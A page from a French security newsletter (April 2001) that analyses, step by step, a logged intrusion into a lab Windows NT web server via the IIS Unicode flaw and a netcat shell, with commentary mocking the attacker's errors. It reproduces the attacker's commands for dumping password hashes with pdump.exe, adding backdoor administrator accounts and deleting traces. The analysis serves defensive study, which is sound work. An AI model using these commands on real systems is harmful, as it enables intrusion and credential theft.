Veille Technologique Sécurité - cert devoteam
Veille Technologique Sécurité - cert devoteam
Veille Technologique Sécurité - cert devoteam
Create successful ePaper yourself
Turn your PDF publications into a flip-book with our unique Google optimized e-Paper software.
Avril 2001<br />
Durée 8s A partir de cet instant, l'attaquant attaque sur 2 fronts en maintenant la connexion ouverte<br />
NC 6969 1342 Ouverture connexion TCP port 6969<br />
Accès distant sur le système<br />
1345 - 'dir'<br />
Localication de pdump.exe<br />
UNICODE 1361 cmd.exe /c c:\xxxx\xxx\msadc\pdump.exe >> yay.txt Récupération des mots de passe<br />
NC 6969 1371 - 'dir' (plusieurs fois)<br />
Contrôle du résultat de pdump.exe<br />
1398 - 'del ftpcom'<br />
Effacement du fichier de commande<br />
1411 - 'dir'<br />
Contrôle du résultat de pdump.exe<br />
1430 - 'type readme'<br />
????<br />
UNICODE 1444 cmd.exe /c c:\xxxx\xxx\msadc\pdump.exe >> yay.txt Nouvelle tentative<br />
Durée 1mn03s Désormais, l'attaquant travail en mode interactif mais n'est pas sûr de lui !<br />
NC 6969 1458 -'c:'<br />
Commande erronée<br />
1462 - 'cd \'<br />
Retour à la racine<br />
1466 - 'dir'<br />
Visualisation du répertoire<br />
1479 - 'rm'<br />
Erreur, on n'est pas sous UNIX !<br />
1489 - 'del fun'<br />
Destruction d'un fichier inexistant<br />
1493 - 'dir'<br />
On vérifie<br />
1506 - 'cd exploites'<br />
Déplacement vers un répertoire inexistant<br />
1510 - 'dir'<br />
On vérifie<br />
1521 - 'cd exploits' 'dir'<br />
On parcours les différents répertoires<br />
1544 - 'cd microsoft' 'dir' 'cd exploits'<br />
Et on atteint le rythme de croisière<br />
1562 - 'cd newfile' 'dir' 'cd ..'<br />
1582 - 'cd unix' 'dir' 'cd ..'<br />
1605 - 'cd ..' 'dir'<br />
De retour à la racine<br />
UNICODE 1623 cmd.exe /c c:\xxxx\xxx\msadc\pdump.exe >> yay.txt Nouvelle tentative<br />
Durée 2mn08s De très nombreuses erreurs confirment l'inexpérience ou la nervosité de l'attaquant<br />
NC 6969 1633 - 'dir'<br />
Contrôle du résultat de pdump.exe<br />
1642 - 'dir ..' 'dir'<br />
En se trompant à plusieurs reprises<br />
1660 - 'cat yay.txt'<br />
Il ne s'agit pas d'un système UNIX<br />
1668 - 'type yay' 'type aya.txt'<br />
Mais bien d'un système NT<br />
1691 - 'net session' [Access denied]<br />
Visualisation des connexions NetBios<br />
1702 - 'net users'<br />
Visualisation des comptes locaux<br />
Durée 2mn33s L'attaquant est persuadé disposer de privilèges supplémentaires via l'attaque UNICODE !!!<br />
UNICODE 1734 cmd.exe /c net session >> yay2.txt<br />
Nouvelle tentative de visualisation Netbios<br />
1753 cmd.exe /c net session >> yay2.txt<br />
Incrédulité ou naïveté<br />
NC 6969 1765 - 'dir'<br />
Contrôle du résultat<br />
1782 - 'type aya2.txt'<br />
Le fichier a été crée mais ne contient rien<br />
1799 - 'del aya2.txt'<br />
Destruction des traces (quid de 'yay.txt' !)<br />
1826 - 'net session > yay3.txt'<br />
Quelle persévérance<br />
1849 - 'dir' 'del yay&.*'<br />
Destruction laborieuse des traces<br />
1866 - 'del yay.*'<br />
Cannot …. Used by another process' !!!<br />
1885 - 'del yay3.txt' 'dir'<br />
Not found. La tension monte …<br />
UNICODE 1905 cmd.exe /c net user >> heh.txt<br />
Oubli, le résultat est déjà connu<br />
1992 cmd.exe /c net user >> c:\heh.txt<br />
Durée 31s Les actions suivantes se répètent avec toujours de nombreuses erreurs de frappe.<br />
UNICODE …..<br />
Durée 1mn08s L'attaquant ne peut s'empêcher de signer son 'forfait' !<br />
NC 6969 2085 echo Hi, i know that this a is a lab server but patch the Tout exploit doit être signé sinon à quoi<br />
holes ! :-) >> README.NOW.Hax0r<br />
bon se fatiguer..<br />
Durée 4mn35 Il tente de créer 2 utilisateurs déjà déclarés en utilisant l'aide en ligne !<br />
NC 6969 2187 'net group ?'<br />
Une bonne dizaine de tentatives pour<br />
2203 'net group /?'<br />
arriver à visualiser les groupes déclarés !<br />
UNICODE 2320 cmd.exe /c net localgroup DomainsAdmins WAM_KENNY Et toujours de multiples erreurs en<br />
2339 /ADD<br />
cmd.exe /c net localgroup DomainsAdmins IUSR_KENNY<br />
/ADD<br />
voulant créer un compte privilégié !<br />
NC 6969 2401 'net local group domains admins'<br />
Idem en interactif. L'attaquant semble<br />
2445 'net localgroup adm inistrators'<br />
découvrir les subtilités de l'administration<br />
UNICODE 2452 cmd.exe /c net localgroup Administrators IUSR_KENNY /ADD Et toujours de multiples erreurs en<br />
2471 cmd.exe /c net localgroup Administrators WAM_KENNY /ADD voulant créer un compte privilégié !<br />
NC 6969 2506 'net localgroup administrators' On contrôle le résultat en interactif<br />
Durée 2mn28 Les actions suivantes visent à parcourir le système avec de nombreuses erreurs<br />
NC 6969<br />
…..<br />
2773 'ps u'<br />
Toujours et encore UNIX<br />
2786 'pdump.exe'<br />
….<br />
[Failed to open LSA]<br />
Une explication du problème rencontré !<br />
Durée 6mn25 Une nouvelle tentative de création d'un compte est effectuée<br />
UNICODE 2814 cmd.exe /c net user testuser UgotHacked /ADD<br />
2833 cmd.exe /c net localgroup Administrators testuser /ADD<br />
NETBIOS 2840 NETBIOS over TCP Tentative de connexion<br />
NC 6969 2903 'net users'<br />
…<br />
Hélas, le compte n'a pas été créé<br />
2949 'net users hi guy /add'<br />
…<br />
Encore une tentative sans succès<br />
2980 'net password'<br />
…<br />
Une commande inexistante<br />
3055 'net user himan Har Har666 /ADD'<br />
Une nouvelle tentative qui échoue<br />
Durée 17s Finalement, l'attaquant efface (presque) toutes ses traces<br />
<strong>Veille</strong> <strong>Technologique</strong> <strong>Sécurité</strong> N°33 Page 46/59<br />
© APOGEE Communications - Tous droits réservés Diffusion restreinte aux clients abonnés aux services VTS-RAPPORT et VTS-ENTREPRISE